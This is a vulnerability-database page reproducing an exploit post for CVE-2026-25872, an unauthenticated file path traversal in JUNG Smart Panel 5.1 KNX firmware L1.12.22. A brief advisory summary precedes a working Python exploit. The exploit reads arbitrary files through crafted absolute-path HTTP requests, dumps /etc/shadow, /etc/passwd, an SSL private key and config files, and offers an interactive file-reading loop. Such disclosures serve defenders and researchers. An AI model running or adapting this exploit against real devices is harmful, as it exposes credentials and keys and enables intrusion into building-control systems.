Vulners
Lucene search
π JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal
ποΈΒ 16 Feb 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 115Β Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2026-25872 | 10 Feb 202622:25 | β | attackerkb |
 | JUNG Smart Panel KNX θ·―εΎιεζΌζ΄ | 10 Feb 202600:00 | β | cnnvd |
 | CVE-2026-25872 | 10 Feb 202622:25 | β | cve |
 | CVE-2026-25872 JUNG Smart Panel 5.1 KNX Unauthenticated Path Traversal | 10 Feb 202622:25 | β | cvelist |
 | CVE-2026-25872 | 10 Feb 202623:16 | β | nvd |
 | PT-2026-7476 | 10 Feb 202600:00 | β | ptsecurity |
 | CVE-2026-25872 | 12 Feb 202601:04 | β | redhatcve |
 | CVE-2026-25872 JUNG Smart Panel 5.1 KNX Unauthenticated Path Traversal | 10 Feb 202622:25 | β | vulnrichment |
 | JUNG Smart Panel 5.1 KNX Unauthenticated Absolute File Path Traversal | 10 Feb 202600:00 | β | zeroscience |
=============================================================================================================================================
| # Title : JUNG Smart Panel 5.1 KNX (L1.12.22) β Unauthenticated File Path Traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.jung-group.com/en-DE |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215430/ & ZSL-2026-5969
[+] Summary : An unauthenticated file path traversal vulnerability has been identified in JUNG Smart Panel 5.1 KNX firmware version L1.12.22, developed by ALBRECHT JUNG GMBH & CO. KG.
The flaw allows remote attackers to read arbitrary files from the underlying operating system without authentication. By crafting a specially formed HTTP request
containing manipulated file paths, an attacker can retrieve sensitive system files such as configuration files, credential stores, network settings, and cryptographic material.
[+] Successful exploitation may result in:
Disclosure of system user accounts
Exposure of password hashes
Leakage of SSL private keys
Exposure of application configuration files
Further privilege escalation or lateral movement
The vulnerability does not require valid credentials and can be exploited remotely over HTTP, significantly increasing its impact in exposed environments.
CVE ID: CVE-2026-25872
Affected Version: L1.12.22
Impact: Confidentiality compromise
Attack Vector: Remote (Unauthenticated)
Severity: High / Critical (depending on deployment exposure)
[+] POC :
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class JUNGSmartPanelExploit:
def __init__(self, target_ip):
self.target_ip = target_ip
self.base_url = f"http://{target_ip}"
self.session = requests.Session()
def read_file(self, file_path):
"""
Read arbitrary files from the target system
Example: /etc/shadow, /etc/passwd, /etc/hostname
"""
try:
url = f"{self.base_url}//{file_path.lstrip('/')}"
response = self.session.get(
url,
timeout=10,
verify=False,
allow_redirects=False
)
if response.status_code == 200 and response.text:
return response.text
else:
return f"[!] Failed to read {file_path} (Status: {response.status_code})"
except Exception as e:
return f"[!] Error: {str(e)}"
def exploit(self):
"""Main exploitation function"""
print(f"\n[*] Targeting JUNG Smart Panel at {self.target_ip}")
print("[*] Checking vulnerability...")
test_file = "/etc/hostname"
result = self.read_file(test_file)
if "Failed" not in result and "Error" not in result:
print("[+] Target is VULNERABLE!")
print(f"[+] Successfully read {test_file}:")
print("-" * 50)
print(result.strip())
print("-" * 50)
return True
else:
print("[-] Target may not be vulnerable or is unreachable")
return False
def dump_sensitive_files(self):
"""Dump common sensitive files"""
sensitive_files = [
"/etc/shadow",
"/etc/passwd",
"/etc/hostname",
"/etc/network/interfaces",
"/etc/hosts",
"/proc/version",
"/proc/cpuinfo",
"/var/www/html/config.php",
"/etc/ssl/private/ssl-cert-snakeoil.key"
]
print("\n[*] Dumping sensitive files...")
for file_path in sensitive_files:
print(f"\n[>] Reading: {file_path}")
print("-" * 40)
content = self.read_file(file_path)
print(content[:200] + "..." if len(content) > 200 else content)
print("-" * 40)
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip>")
print(f"Example: {sys.argv[0]} 17.17.17.17")
sys.exit(1)
target = sys.argv[1]
exploit = JUNGSmartPanelExploit(target)
if exploit.exploit():
print("\n[*] Interactive mode - Enter file paths to read (or 'quit'):")
while True:
file_path = input("\n[?] File path (e.g., /etc/shadow): ").strip()
if file_path.lower() == 'quit':
break
if file_path:
content = exploit.read_file(file_path)
print(content)
if __name__ == "__main__":
print("=" * 60)
print("JUNG Smart Panel 5.1 KNX File Disclosure Exploit")
print("ZSL-2026-5969 | CVE-2026-25872")
print("=" * 60)
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.15.3
CVSS 46.9
EPSS0.00014
SSVC